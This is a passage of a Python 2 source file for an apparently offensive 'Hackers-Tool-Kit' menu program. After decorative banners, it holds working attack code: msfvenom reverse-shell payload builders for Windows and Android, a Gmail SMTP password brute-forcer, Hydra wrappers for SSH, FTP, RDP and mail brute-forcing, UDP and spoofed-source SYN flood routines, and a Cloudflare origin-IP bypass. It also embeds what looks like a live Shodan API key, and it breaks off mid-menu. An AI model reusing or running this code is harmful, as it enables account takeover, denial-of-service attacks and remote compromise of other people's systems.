,,,,,,,,,,,,,,,,,,,,,,,*,,,,,,,,,,,,,,,,,,,,,,, - ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, - ***********************************************\033[91m - - ▄████▄ █ ██ ▄▄▄█████▓ ██████ - ▒██▀ ▀█ ██ ▓██▒▓ ██▒ ▓▒▒██ ▒ - ▒▓█ ▄ ▓██ ▒██░▒ ▓██░ ▒░░ ▓██▄ - ▒▓▓▄ ▄██▒▓▓█ ░██░░ ▓██▓ ░ ▒ ██▒ - ▒ ▓███▀ ░▒▒█████▓ ▒██▒ ░ ▒██████▒▒ - ░ ░▒ ▒ ░░▒▓▒ ▒ ▒ ▒ ░░ ▒ ▒▓▒ ▒ ░ - ░ ▒ ░░▒░ ░ ░ ░ ░ ░▒ ░ ░ - ░ ░░░ ░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ - ░ \033[0m - """.decode('utf-8') -def mainbanner6(): - print """ - |-|____________________ - /|_|_\ /__,''___ /____ /| - |\033[90mHHHHHH\033[0m| \_/ |\033[90mHHHHH\033[0m|/| - |``````|_________|`````| | - | \033[93m~~~~~~~~~~~~~~\033[0m | | - | .-/\-, | | - | _\\//_ | | - | \033[92m| /(_)|\033[0m | | - |\033[92m_______|_||.-.|_______\033[0m|/| - |\033[90mHHHHHHH\033[0m| ||:_ |\033[90mHHHHHHH\033[0m|/| - |\033[92m```````|_||:_)|```````\033[0m| | - | \033[92m|______| \033[0m| | - | ______ | | - | (__\033[90m24\033[0m__) | | - | ~~~~~~~~ | | - | By @tuf_unkn0wn | | - |______________________|/ - \033[91m - ) ( ) ( - ( /( )\ ) ( /( )\ ( ( ( - )\()|(_| /( ( )\()) ((_)))\ ( )\))( ( - ((_)\ _ )(_)) )\((_)\ _ /((_) )\ )((_))\ )\ - | |(_) ((_)_ ((_) |(_) | (_))( _(_/( (()(_|(_) - | '_ \ / _` / _|| / / | | || | ' \)) _` |(_-< - |_.__/_\__,_\__||_\_\ |_|\_,_|_||_|\__, |/__/ - |___/ - \033[90m - ) - (\033[33m - _ \033[0m___________ \033[90m)\033[33m - [_[\033[0m___________\033[91m#\033[0m - type ? for help - """.decode('utf-8') -def mainbanner7(): - os.system("cat /root/hackers-tool-kit/tools/skull.txt") -def mainbanner8(): - print """ - type ? for help\033[91m - -@@@ /$$ /$$ @@@ -@@@ | $$ | $$ @@@ -@@! | $$ | $$ @@! -!@! | $$$$$$$$ !@! -!!@ | $$__ $$ !!@ -!!! | $$ | $$ !!! -!!: | $$ | $$ !!: -:!: |__/ |__/ :!: -@@@ @@@\033[94m -@@@ @@@ -@@! @@! -!@! /$$$$$$$$ !@! -!!@ |__ $$__/ !!@ -!!! | $$ !!! -!!: | $$ !!: -:!:---------------| $$---------------:!: -@@@ | $$ @@@ -@@@ | $$ @@@ -@@! |__/ @@! -!@! !@!\033[91m -!!@ !!@ -!!! /$$ /$$ !!! -!!: | $$ /$$/ !!: -:!: | $$ /$$/ :!: -@@@ | $$$$$/ @@@ -@@@ | $$ $$ @@@ -@@! | $$\ $$ @@! -!@! | $$ \ $$ !@! -!!@ |__/ \__/ !!@ -!!! !!! -!!: !!: -:!: :!:\033[92m - :: :: -: @tuf_unkn0wn :\033[0m -""" -def mainbanner9(): - print """ -\033[91m╔\033[0m██████████████████████████████████████████████████████████████████\033[91m═╗ -║ ║ -\033[33m║ ║ -║\033[0m ▄▀▀▀▀▄ ▄▀▀▄ ▀▀▄ ▄▀▀▀▀▄ ▄▀▀▀█▀▀▄ ▄▀▀█▄▄▄▄ ▄▀▀▄ ▄▀▄ \033[33m║ -\033[93m║\033[0m █ █ ▐ █ ▀▄ ▄▀ █ █ ▐ █ █ ▐ ▐ ▄▀ ▐ █ █ ▀ █ \033[93m║ -║\033[0m ▀▄ ▐ █ ▀▄ ▐ █ █▄▄▄▄▄ ▐ █ █ \033[93m║ -\033[92m║\033[0m ▀▄ █ █ ▀▄ █ █ █ ▌ █ █ \033[92m║ -║\033[0m █▀▀▀ ▄▀ █▀▀▀ ▄▀ ▄▀▄▄▄▄ ▄▀ ▄▀ \033[92m║ -\033[1;36m║\033[0m ▐ █ ▐ █ █ ▐ █ █ \033[1;36m║ -║\033[0m ▐ ▐ ▐ ▐ ▐ \033[1;36m║ -\033[94m║\033[0m ▄▀▀█▄▄ ▄▀▀▀▀▄ ▄▀▀▄ ▄▀▀▄ ▄▀▀▄ ▀▄ \033[94m║ -║\033[0m █ ▄▀ █ █ █ █ █ ▐ █ █ █ █ █ \033[94m ║ -\033[34m║\033[0m ▐ █ █ █ █ ▐ █ █ ▐ █ ▀█ \033[34m║ -║\033[0m █ █ ▀▄ ▄▀ █ ▄ █ █ █ \033[34m║ -\033[95m║\033[0m ▄▀▄▄▄▄▀ ▀▀▀▀ ▀▄▀ ▀▄ ▄▀ ▄▀ █ \033[95m║ -║\033[0m █ ▐ ▀ █ ▐ \033[95m║ -\033[35m║\033[0m ▐ ▐ \033[35m║ -║ ║\033[1;31m -╚═\033[0m█████████████████████████████████████████████████████████████████\033[1;31m═╝\033[0m - type ? for help - """.decode('utf-8') - - -def mainbanner(): - import random - for x in range(10): - num = random.randint(1,9) - if num == 1: - mainbanner1() - if num == 2: - mainbanner2() - if num == 3: - mainbanner3() - if num == 4: - mainbanner4() - if num == 5: - mainbanner5() - if num == 6: - mainbanner6() - if num == 7: - mainbanner7() - if num == 8: - mainbanner8() - if num == 9: - mainbanner9() -#--------------------------# -#MAIN STARTING BANNER END# - - -#HELP BANNER START# -#-----------------# -def help(): - print B+""" -▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒▒▓ ▒ ▒ ░ ░▒ ▒ ▒ ░░▒░▒▒▓▒▒░ ▒▓▒▒░ ▒ ░ ░ ▒░ ▒ ▒ - ▒ ▒▒ ░░ ░▒ ░ ░ ░ ▒ ▒ ░ ░ ░ ▒ ░▒░ ░▒ ░▒░ ▒ ░▒░ ░ ░ ░░ ░ ▒░ - ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ -\033[0m ░ -? : displays this message -clear : clears screen except for banner -clearall: clears everything on screen -banner : clears screen and shows new banner -exit : exits script -restart : re run hackers-tool-kit -rebootl : reboot whole device -winload : windows reverse_tcp payload -andload : android reverse_tcp payload -connect : connect to a host -command : execute terminal command -msfcon : metasploit console -set : setoolkit console -msfven : msfvenom -gmail : gmail bruteforce -insta : instagram bruteforce -fb : facebook bruteforce -hydra : Black-Hydra bruteforce -medusa : Medusa bruteforce -ipgrab : host to ip address -myip : show your ip -wifite : automated wifi hacker -reaver : reaver automated [ wifi hack ] -aircrack: aircrack-ng automated [ wifi hack ] -mon : put device in monitor mode -monoff : put device out of monitor mode -netdev : find all devices in your network -scannet : scan for networks around you -specnet : scan a specific network -port : scan for ports on a host -info : info gather on a host [includes port scan]\033[91m █████████████████████ \033[0m -sysinfo : info about your system \033[91m ██ ██\033[0m -msfex : shows all metasploit exploits \033[91m ██ ██\033[0m -msfpa : shows all metasploit payloads \033[91m ██\033[90m ██ ██\033[91m ██\033[0m -msfau : shows all metasploit auxiliarys \033[91m ██\033[90m ██ ██\033[91m ██\033[0m -msfall : shows all metasploit modules \033[91m ██ ██\033[0m -udp : UDP flood / dos \033[91m ██ \033[90m █ \033[91m ██\033[0m -tcp : TCP flood / dos \033[91m ██\033[90m █ \033[91m ██\033[0m -syn : SYN flood / dos \033[91m █ █\033[0m -slowl : Slow Loris dos \033[91m █ █ \033[0m -ping : pings host \033[91m █ █\033[0m -multih : start a multi handler \033[91m █ █\033[0m -cupp : make wordlists \/ vvvvvvvvv \/ -vdir : view files of a directory -vpn : activate a vpn -vpnoff : stop vpn -pidox : dox website -pingen : Generate a routers default pin -deauth : deauth attack / wifi jammer -macc : changes mac address -macoff : returns mac address to normal Hackers-Tool-Kit -arpspoof: arp spoofing | -sslscan : ssl scan a host ██╗ ██╗ ████████╗ ██╗ ██╗ -payload : make a metasploit payload of your choice ██║ ██║ ╚══██╔══╝ ██║ ██╔╝ -crunch : Make wordlists ███████║\033[91m█████\033[0m╗██║\033[91m█████\033[0m╗█████╔╝ -traff : shows your internet traffic ██╔══██║╚════╝██║╚════╝██╔═██╗ -resa : reset account password ██║ ██║ ██║ ██║ ██╗ -resu : reset unix password ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ -hashid : find the type of hash of a hash | -wafwoof : check a web application for firewall Hackers-Tool-Kit -cloud : cloudflare bypass -brutex : auto bruteforce every service of a host -methelp : show meterpreter help -winbyp : windows defender bypass -exploit : use a metasploit exploit of your choice -phish : phishing automated -datalist: list all hosts & services in the database -msfev : shows all metasploit evasions -upgrade : fully update your linux os -nscript : use a nmap script -sshver : scan for ssh version on a host -chains : browse web anonymous via proxychains [proxychains setup required] -mysqlv : scan for mysql version on a host -terminal: open another new terminal -source : get source code from a website -dirscan : web directory scanner / bruteforce -aserver : start a apache server -run : run a file -phpload : make a php reverse_tcp payload and start it in a multi handler -pyload : make a python reverse_tcp payload and start it in a multi handler -\033[91m---------------------------------------------------------------------------------\033[0m - """ -#-----------------# -#HELP BANNER END# - - -#WINDOWS REVERSE TCP PAYLOAD START# -#---------------------------------# -def winload(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - pf = raw_input("Port: ") - na = raw_input("Name of File: ") - ak = 'msfvenom -p windows/meterpreter/reverse_tcp LPORT={0} -f exe -o /root/{1}.exe LHOST={2}'.format(pf,na,ipaddr) - os.system(ak) -#-------------------------------# -#WINDOWS REVERSE TCP PAYLOAD END# - - -#ANDROID REVERSE TCP PAYLOAD START# -#---------------------------------# -def andload(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - pf = raw_input("Port: ") - na = raw_input("Name of File: ") - ak = 'msfvenom -p android/meterpreter/reverse_tcp LPORT={0} -o /root/{1}.apk LHOST={2}'.format(pf,na,ipaddr) - os.system(ak) -#-------------------------------# -#ANDROID REVERSE TCP PAYLOAD END# - -#GMAIL BRUTEFORCE START# -#----------------------# -def gmail(): - #!/usr/bin/python - '''create by Ha3MrX''' - - import smtplib - from os import system - - def main(): - print '\033[93m=================================================' - print '\033[91m create by Ha3MrX ' - print '\033[93m=================================================' - print '\033[95m ++++++++++++++++++++ ' - print '\n ' - print '\033[92m _,. ' - print ' ' - print ' ' - print ' HA3MrX ' - print ' _,. ' - print ' ,` -.) ' - print ' ( _/-\\-._ ' - print ' /,|`--._,-^| , ' - print ' \_| |`-._/|| , | ' - print ' | `-, / | / / ' - print ' | || | / / ' - print ' `r-._||/ __ / / ' - print ' __,-<_ )`-/ `./ / ' - print ' \ `--- \ / / / ' - print ' | |./ / ' - print ' / // / ' - print ' \_/ \ |/ / ' - print ' | | _,^- / / ' - print ' | , `` (\/ /_ ' - print ' \,.->._ \X-=/^ ' - print ' ( / `-._//^` ' - print ' `Y-.____(__} ' - print ' | {__) ' - print ' () \033[91m V.1.0 ' - - main() - print '\033[0m[1] start the attack' - print '[2] exit' - option = input('==>') - if option == 1: - file_path = raw_input('path of passwords file :') - else: - system('clear') - exit() - pass_file = open(file_path,'r') - pass_list = pass_file.readlines() - def login(): - i = 0 - user_name = raw_input('target email :') - server = smtplib.SMTP_SSL('smtp.gmail.com', 465) - server.ehlo() - for password in pass_list: - i = i + 1 - print str(i) + '/' + str(len(pass_list)) - try: - server.login(user_name, password) - system('clear') - main() - print '\n' - print '[+] This Account Has Been Hacked Password :' + password + ' ^_^' - break - except smtplib.SMTPAuthenticationError as e: - error = str(e) - if error[14] == '<': - system('clear') - main() - print '[+] this account has been hacked, password :' + password + ' ^_^' - - break - else: - print '[!] password not found => ' + password - login() -#--------------------# -#GMAIL BRUTEFORCE END# - -#PORT SCAN START# -#---------------# -def port(): - n = raw_input("Enter Target: ") - os.system("nmap " + n) -#-------------# -#PORT SCAN END# - -#INSTAGRAM BRUTEFORCE START# -#--------------------------# -def insta(): - insta = raw_input("USERNAME> ") - jl = raw_input("WORDLIST> ") - k = raw_input("THREADS> ") - ma = 'python /root/hackers-tool-kit/tools/instagram.py {0} {1} {2}'.format(insta,jl,k) - os.system(ma) -#------------------------# -#INSTAGRAM BRUTEFORCE END# - -#FACEBOOK BRUTEFORCE START# -#-------------------------# -def fb(): - facebook = raw_input("[EMAIL/ID->]: ") - word = raw_input("[WORDLIST->]: ") - ks = 'cd /root/hackers-tool-kit/tools && perl fb-brute.pl {0} {1}'.format(facebook,word) - os.system(ks) -#-----------------------# -#FACEBOOK BRUTEFORCE END# - -#HOST TO IP START# -#----------------# -def ipgrab(): - b = raw_input(Y+'Enter Host:\033[0m ') - ip = socket.gethostbyname(b) - print G+"------------------------\033[0m" - print N+"Host: ", b - print N+"IP: ", ip - print G+"------------------------\033[0m" -#--------------# -#HOST TO IP END# - -#YOUR OWN IP START# -#-----------------# -def myip(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - print ("IP: ", ipaddr, " Gateway:", gateway, " Host:", host) - print "\n Router IP" - print "----------------------------\033[92m" - os.system('curl "http://myexternalip.com/raw"') - print "\n\033[0m----------------------------" -#---------------# -#YOUR OWN IP END# - - -#AUTOMATED WIFI HACK START# -#-------------------------# -def wifite(): - os.system("wifite") -#-----------------------# -#AUTOMATED WIFI HACK END# - - -#MONITOR MODE START# -#------------------# -def mon(): - os.system("iwconfig") - i = raw_input("Select Interface: ") - os.system("airmon-ng start " + i) -#----------------# -#MONITOR MODE END# - - -#DEVICES IN THE NET START# -#------------------------# -def netdev(): - os.system("netdiscover") -#----------------------# -#DEVICES IN THE NET END# - - -#NETS AROUND YOU START# -#-----------------------# -def scannet(): - os.system("iwconfig") - m = raw_input("Select Interface: ") - print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" - j = raw_input("[y/n]> ") - if j == "y": - os.system("airodump-ng -w /root/SCAN " + m) - print Y+"! SCAN RESULTS SAVED IN /root/ DIRECTORY !\033[0m" - if j == "n": - os.system("airodump-ng " + m) -#---------------------# -#NETS AROUND YOU END# - - -#INFO SCAN HOST START# -#--------------------# -def info(): - params = [] - # Browser - br = mechanize.Browser() - - # Just some colors and shit - white = '\033[1;97m' - green = '\033[1;32m' - red = '\033[1;31m' - yellow = '\033[1;33m' - end = '\033[1;m' - info = '\033[1;33m[!]\033[1;m' - que = '\033[1;34m[?]\033[1;m' - bad = '\033[1;31m[-]\033[1;m' - good = '\033[1;32m[+]\033[1;m' - run = '\033[1;97m[~]\033[1;m' - - # Cookie Jar - cj = cookielib.LWPCookieJar() - br.set_cookiejar(cj) - - # Browser options - br.set_handle_equiv(True) - br.set_handle_redirect(True) - br.set_handle_referer(True) - br.set_handle_robots(False) - - # Follows refresh 0 but not hangs on refresh > 0 - br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) - br.addheaders = [ - ('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] - - - print '''\033[1;31m - _________ __ __ __ - / _____// |________|__| | __ ___________ - \_____ \\\\ __\_ __ \ | |/ // __ \_ __ \\ - / \| | | | \/ | <\ ___/| | \/ - /_______ /|__| |__| |__|__|_ \\\\___ >__| - \/ \/ \/\033[1;m''' - target = raw_input('\033[1;34m[?]\033[1;m Enter the target: ') - if 'http' in target: - parsed_uri = urlparse(target) - domain = '{uri.netloc}'.format(uri=parsed_uri) - else: - domain = target - try: - br.open('http://' + target) - target = 'http://' + target - except: - target = 'https://' + target - - def sqli(url): - print '%s Using SQLMap api to check for SQL injection vulnerabilities. Don\'t worry we are using an online service and it doesn\'t depend on your internet connection. This scan will take 2-3 minutes.' % run - br.open('https://suip.biz/?act=sqlmap') - br.select_form(nr=0) - br.form['url'] = url - req = br.submit() - result = req.read() - match = search(r"---(?s).*---", result) - if match: - print '%s One or more parameters are vulnerable to SQL injection' % good - option = raw_input( - '%s Would you like to see the whole report? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - print '\033[1;31m-\033[1;m' * 40 - print match.group().split('---')[1][:-3] - print '\033[1;31m-\033[1;m' * 40 - else: - print '%s None of parameters is vulnerable to SQL injection' % bad - - - def cms(domain): - try: - result = br.open('https://whatcms.org/?s=' + domain).read() - detect = search(r'class="nowrap" title="[^<]*">', result) - WordPress = False - try: - r = br.open(target + '/robots.txt').read() - if "wp-admin" in str(r): - WordPress = True - except: - pass - if detect: - print '%s CMS Detected : %s' % (info, detect.group().split('class="nowrap" title="')[1][:-2]) - detect = detect.group().split('">')[1][:-27] - if 'WordPress' in detect: - option = raw_input( - '%s Would you like to use WPScan? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - os.system('wpscan --random-agent --url %s' % domain) - elif WordPress: - print '%s CMS Detected : WordPress' % info - option = raw_input( - '%s Would you like to use WPScan? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - os.system('wpscan --random-agent --url %s' % domain) - else: - print '%s %s doesn\'t seem to use a CMS' % (info, domain) - except: - pass - - def honeypot(ip_addr): - result = {"0.0": 0, "0.1": 10, "0.2": 20, "0.3": 30, "0.4": 40, "0.5": 50, "0.6": 60, "0.7": 70, "0.8": 80, "0.9": 90, "1.0": 10} - honey = 'https://api.shodan.io/labs/honeyscore/%s?key=C23OXE0bVMrul2YeqcL7zxb6jZ4pj2by' % ip_addr - try: - phoney = br.open(honey).read() - if float(phoney) >= 0.0 and float(phoney) <= 0.4: - what = good - else: - what = bad - print '{} Honeypot Probabilty: {}%'.format(what, result[phoney]) - except KeyError: - print '\033[1;31m[-]\033[1;m Honeypot prediction failed' - - def whoisIt(url): - who = "" - print '{} Trying to gather whois information for {}'.format(run,url) - try: - who = str(whois.whois(url)).decode() - except Exception: - pass - test = who.lower() - if "whoisguard" in test or "protection" in test or "protected" in test: - print '{} Whois Protection Enabled{}'.format(bad, end) - else: - print '{} Whois information found{}'.format(good, end) - try: - data = json.loads(who) - for key in data.keys(): - print "{} :".format(key.replace("_", " ").title()), - if type(data[key]) == list: - print ", ".join(data[key]) - else: - print "{}".format(data[key]) - except ValueError: - print '{} Unable to build response, visit https://who.is/whois/{} {}'.format(bad, url, end) - pass - - def nmap(ip_addr): - port = 'http://api.hackertarget.com/nmap/?q=' + ip_addr - result = br.open(port).read() - result = sub(r'Starting[^<]*\)\.', '', result) - result = sub(r'Service[^<]*seconds', '', result) - result = os.linesep.join([s for s in result.splitlines() if s]) - print result - - def bypass(domain): - post = urlencode({'cfS': domain}) - result = br.open( - 'http://www.crimeflare.info/cgi-bin/cfsearch.cgi ', post).read() - - match = search(r' \b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b', result) - if match: - bypass.ip_addr = match.group().split(' ')[1][:-1] - print '%s Real IP Address : %s' % (good, bypass.ip_addr) - - def dnsdump(domain): - res = DNSDumpsterAPI(False).search(domain) - print '\n%s DNS Records' % good - for entry in res['dns_records']['dns']: - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - for entry in res['dns_records']['mx']: - print '\n%s MX Records' % good - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - print '\n\033[1;32m[+]\033[1;m Host Records (A)' - for entry in res['dns_records']['host']: - if entry['reverse_dns']: - print '{domain} ({reverse_dns}) ({ip}) {as} {provider} {country}'.format(**entry) - else: - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - print '\n%s TXT Records' % good - for entry in res['dns_records']['txt']: - print entry - print '\n%s DNS Map: https://dnsdumpster.com/static/map/%s.png\n' % (good, domain.strip('www.')) - - - def fingerprint(ip_addr): - try: - result = br.open('https://www.censys.io/ipv4/%s/raw' % ip_addr).read() - match = search(r'"os_description": "[^<]*"', result) - if match: - print '%s Operating System : %s' % (good, match.group().split('n": "')[1][:-5]) - except: - pass - - - ip_addr = socket.gethostbyname(domain) - print '%s IP Address : %s' % (info, ip_addr) - try: - r = requests.get(target) - header = r.headers['Server'] - if 'cloudflare' in header: - print '%s Cloudflare detected' % bad - bypass(domain) - try: - ip_addr = bypass.ip_addr - except: - pass - else: - print '%s Server: %s' % (info, header) - try: - print '%s Powered By: %s' % (info, r.headers['X-Powered-By']) - except: - pass - try: - r.headers['X-Frame-Options'] - except: - print '%s Clickjacking protection is not in place.' % good - except: - pass - fingerprint(ip_addr) - cms(domain) - try: - honeypot(ip_addr) - except: - pass - print "{}----------------------------------------{}".format(red, end) - whoisIt(domain) - try: - r = br.open(target + '/robots.txt').read() - print '\033[1;31m-\033[1;m' * 40 - print '%s Robots.txt retrieved\n' % good, r - except: - pass - print '\033[1;31m-\033[1;m' * 40 - nmap(ip_addr) - print '\033[1;31m-\033[1;m' * 40 - dnsdump(domain) - os.system('cd plugins && python theHarvester.py -d %s -b all' % domain) - try: - br.open(target) - print '%s Crawling the target for fuzzable URLs' % run - for link in br.links(): - if 'http' in link.url or '=' not in link.url: - pass - else: - url = target + '/' + link.url - params.append(url) - if len(params) == 0: - print '%s No fuzzable URLs found' % bad - quit() - print '%s Found %i fuzzable URLs' % (good, len(params)) - for url in params: - print url - sqli(url) - url = url.replace('=', '') - r = br.open(url).read() - if '' in r: - print '%s One or more parameters are vulnerable to XSS' % good - break - print '%s These are the URLs having parameters:' % good - for url in params: - print url - except: - pass -#------------------# -#INFO SCAN HOST END# - - -#INFO ON YOUR SYSTEM START# -#-------------------------# -def sysinfo(): - os.system("iwconfig") - k = raw_input("Interface: ") - os.system("clear") - os.system("ifconfig") - print "\n" - os.system("iwconfig") - print "\n" - os.system("neofetch") - print "\n" - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - print (" IP: ", ipaddr, " Gateway: ", gateway, " Host: ", host) - print "\n Router IP" - print "----------------------------\033[92m" - os.system('curl "http://myexternalip.com/raw"') - print "\n\033[0m----------------------------" - print "\n" - show = 'macchanger -s {0}'.format(k) - os.system(show) -#-----------------------# -#INFO ON YOUR SYSTEM END# - - -#ALL METASPLOIT EXPLOITS START# -#-----------------------------# -def msfex(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show exploits'""") -#---------------------------# -#ALL METASPLOIT EXPLOITS END# - - -#UDP DOS START# -#-------------# -def udp(): - target = raw_input(N+"Target:\033[91m ") - ip = socket.gethostbyname(target) - port = input(N+"Port:\033[91m ") - os.system("service tor restart") - print N+"udp attack started on {0}.{1} | {2}-{3}-{4}".format(hour, minute, day, month, year) - os.system("sleep 2s") - sent = 0 - print "KILLING %s CONNECTIONS"%(ip) - while True: - sock.sendto(Gb, (ip,port)) - sock.sendto(bytes, (ip,port)) - sock.sendto(Kb, (ip,port)) - sent = sent + 1 - port = port + 1 - print B+"|+| Slapping \033[0m|\033[31m %s \033[0m| Port |\033[31m %s \033[0m| Bytes |\033[31m %s \033[0m|"%(ip,port,sent) - if port == 65534: - port = 1 -#-----------# -#UDP DOS END# - -#TCP FLOOD START# -#---------------# -def tcp(): - print Y+"-p = port | -t = threads | Example: tcp 95.52.541.1 -p 80 -t 600\033[0m" - print "\n" - tcp = raw_input(Y+"[\033[92m+\033[91m-\033[0mTCP\033[91m-\033[92m+\033[93m]\033[0m ") - print R+"IF YOU GET SPAMMED WITH ERRORS BUT ITS STILL RUNNING ITS FINE\033[0m" - os.system("sleep 5") - os.system("python /root/hackers-tool-kit/tools/" + tcp) -#-------------# -#TCP FLOOD END# - - -#SYN FLOOD START# -#---------------# -def syn(): - def randomIP(): - ip = ".".join(map(str, (random.randint(0,255)for _ in range(4)))) - return ip - - def randInt(): - x = random.randint(1000,9000) - return x - - def SYN_Flood(dstIP,dstPort,counter): - total = 0 - print "Packets are sending ..." - for x in range (0,counter): - s_port = randInt() - s_eq = randInt() - w_indow = randInt() - - IP_Packet = IP () - IP_Packet.src = randomIP() - IP_Packet.dst = dstIP - - TCP_Packet = TCP () - TCP_Packet.sport = s_port - TCP_Packet.dport = dstPort - TCP_Packet.flags = "S" - TCP_Packet.seq = s_eq - TCP_Packet.window = w_indow - - send(IP_Packet/TCP_Packet, verbose=0) - total+=1 - sys.stdout.write("\nTotal packets sent: %i\n" % total) - - - def info(): - - dstIP = raw_input ("\nTarget IP : ") - dstPort = input ("Target Port : ") - - return dstIP,int(dstPort) - - - def main(): - dstIP,dstPort = info() - counter = input ("Packets : ") - SYN_Flood(dstIP,dstPort,int(counter)) - - main() -#-------------# -#SYN FLOOD END# - - -#PING A HOST START# -#-----------------# -def ping(): - p = raw_input("Enter Host: ") - os.system("ping " + p) -#---------------# -#PING A HOST END# - - -#ALL METASPLOIT PAYLOADS START# -#-----------------------------# -def msfpa(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show payloads'""") -#---------------------------# -#ALL METASPLOIT PAYLOADS END# - - -#ALL METASPLOIT AUX START# -#------------------------# -def msfau(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show auxiliary'""") -#----------------------# -#ALL METASPLOIT AUX END# - - -#START METASPLOIT HANDLER START# -#------------------------------# -def multih(): - os.system("service postgresql start") - os.system("""msfconsole -x 'use multi/handler'""") -#----------------------------# -#START METASPLOIT HANDLER END# - - -#ALL METASPLOIT MODS START# -#-------------------------# -def msfall(): - os.system("service postgresql start") - os.sytem("""msfconsole -x 'show all'""") -#-----------------------# -#ALL METASPLOIT MODS END# - - -#HYDRA AUTOMATED START# -#---------------------# -def hydra(): - """ - This program is just a small program to shorten brute force sessions on hydra :) - But to be more satisfying results of the brute force. You better interact directly with hydra, - without having to use this black hydra console first: '). - If you find any errors in running our program. Can chat via facebook :). - Hydra is needed for the process of this program :). - """ - import sys, os, time - - # Restart #################### - def restart_program(): - python = sys.executable - os.execl(python, python, * sys.argv) - curdir = os.getcwd() - ############################## - - os.system("clear") - print B+"___ _ ____ ____ _ _ _ _ _ _ ___ ____ ____" - print "|__] | |__| | |_/ |__| \_/ | \ |__/ |__|" - print "|__] |___ | | |___ | \_ | | | |__/ | \ | |" - print G+"-----------------------------------------------------" - print N+"[]xxxxx[]::::::::::::::::::::> 24-07-2017 (7:53)" - print R+" [*] Author: DedSecTL --- [*] Version 1.0" - print N+"c=={:::::::::::::::> Black Hydra Console" - print R+" [*] My FB : https://m.facebook.com/100004136748473" - print N+"(}xxx{):::::::::> AndroSec1337 Cyber Team" - print - print " ===|[ Brute Force ]|===" - print - print " [01] Cisco Brute Force " - print " [02] VNC Brute Force " - print " [03] FTP Brute Force " - print " [04] Gmail Brute Force " - print " [05] SSH Brute Force " - print " [06] TeamSpeak Brute Force " - print " [07] Telnet Brute Force " - print " [08] Yahoo Mail Brute Force " - print " [09] Hotmail Brute Force " - print " [10] Router Speedy Brute Force " - print " [11] RDP Brute Force " - print " [12] MySQL Brute Force " - print - print " [00] Exit" - print - bhydra = raw_input("[*] B-Hydra > ") - - if bhydra == '01' or bhydra == '1': - print - print " +---------------------------+" - print " | Cisco Brute Force |" - print " +---------------------------+" - print - print - iphost = raw_input("[*] IP/Hostname : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -P %s %s cisco" % (word, iphost)) - sys.exit() - - elif bhydra == '02' or bhydra == '2': - print - print " +---------------------------+" - print " | VNC Brute Force |" - print " +---------------------------+" - print - print - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -P %s -e n -t 1 %s vnc -V" % (word, iphost)) - iphost = raw_input("[*] IP/Hostname : ") - - elif bhydra == '03' or bhydra == '3': - print - print " +------------------------------+" - print " | FTP Brute Force |" - print " +------------------------------+" - print - print - user = raw_input("[*] User : ") - iphost = raw_input("[*] IP/Hostname : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost)) - sys.exit() - - elif bhydra == '04' or bhydra == '4': - print - print " +------------------------------+" - print " | Gmail Brute Force |" - print " +------------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '05' or bhydra == '5': - print - print " +--------------------------------+" - print " | SSH Brute Force |" - print " +--------------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s %s ssh" % (user, word, iphost)) - sys.exit() - - elif bhydra == '06' or bhydra == '6': - print - print " +-------------------------+" - print " | TeamSpeak Brute Force |" - print " +-------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (user, word, iphost)) - sys.exit() - - elif bhydra == '07' or bhydra == '7': - print - print " +-------------------------+" - print " | Telnet Brute Force |" - print " +-------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost)) - sys.exit() - - elif bhydra == '08' or bhydra == '8': - print - print " +---------------------------+" - print " | Yahoo Brute Force 